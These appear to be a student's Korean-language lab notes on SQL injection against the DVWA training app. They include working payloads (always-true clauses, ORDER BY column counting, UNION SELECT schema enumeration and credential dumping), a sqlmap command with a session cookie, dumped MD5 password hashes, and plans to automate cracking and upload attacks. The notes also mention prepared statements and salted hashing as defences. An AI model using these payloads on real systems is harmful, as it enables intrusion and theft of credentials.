28일차


250124

SQL 인젝션: 사용자 입력이 쿼리 문자열에 그대로 이어 붙여질 때, 입력이 데이터가 아니라 SQL 문법으로 해석되는 취약점
select from
-- Returns every column of every row in users.
select * from users;
-- Returns only the idx and id_param columns of every row.
select idx,id_param from users;
-- Intended lookup: the quoted literal 'admin' stands for the submitted value
-- (presumably concatenated into the statement by the application; confirm against its code).
select id_param from users where id_param='admin'
-- The same statement once the input  1' or '1'='1  has been concatenated in:
-- the quote inside the input closes the string literal, and '1'='1' is always
-- true, so the WHERE clause no longer filters and every row is returned.
-- Binding the value as a parameter (prepared statement) keeps the input as data
-- and prevents the clause from being rewritten this way.
select id_param from users where id_param='1' or '1'='1'
입력값 변경: admin → 1' or '1'='1 (입력에 포함된 작은따옴표가 문자열 리터럴을 닫아, 바로 위 쿼리처럼 WHERE 조건이 항상 참이 됨)
insert into
update set
delete from

1' or '1'='1
1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3# (X: 오류 발생 — 원래 쿼리가 반환하는 컬럼 수는 2개)

1' UNION SELECT 1,2#
1' UNION SELECT 1,2,3# (X: 컬럼 수가 맞지 않아 오류 발생)

' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
' UNION SELECT user,password from users#

웹 공격 SQL
request
response

업로드 공격

sqlmap -u "http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=uebmf0gupdsoltt5ts7e7hopg3"

admin
5f4dcc3b5aa765d61d8327deb882cf99

gordonb
e99a18c428cb38d5f260853678922e03

1337
8d3533d75ae2c3966d7e0d4fcc69216b

pablo
0d107d09f5bbe40cade3de5c71e9e9b7

smithy
5f4dcc3b5aa765d61d8327deb882cf99

1' UNION SELECT name,pw from users#
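md5 자동화 프로그램 만들기 (참고: 위 해시는 모두 32자리 16진수이고 admin과 smithy의 값이 같음 — 사용자별 솔트가 없어 같은 비밀번호가 같은 해시로 저장된 것으로 보임. 비밀번호 저장에는 솔트를 적용하는 bcrypt/Argon2 같은 느린 해시를 써야 함)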
SQL 자동화 프로그램 만들기
21,22,23,25,110,143,3306
80, 443
Attack.py에 업로드 자동 공격 코드 추가하기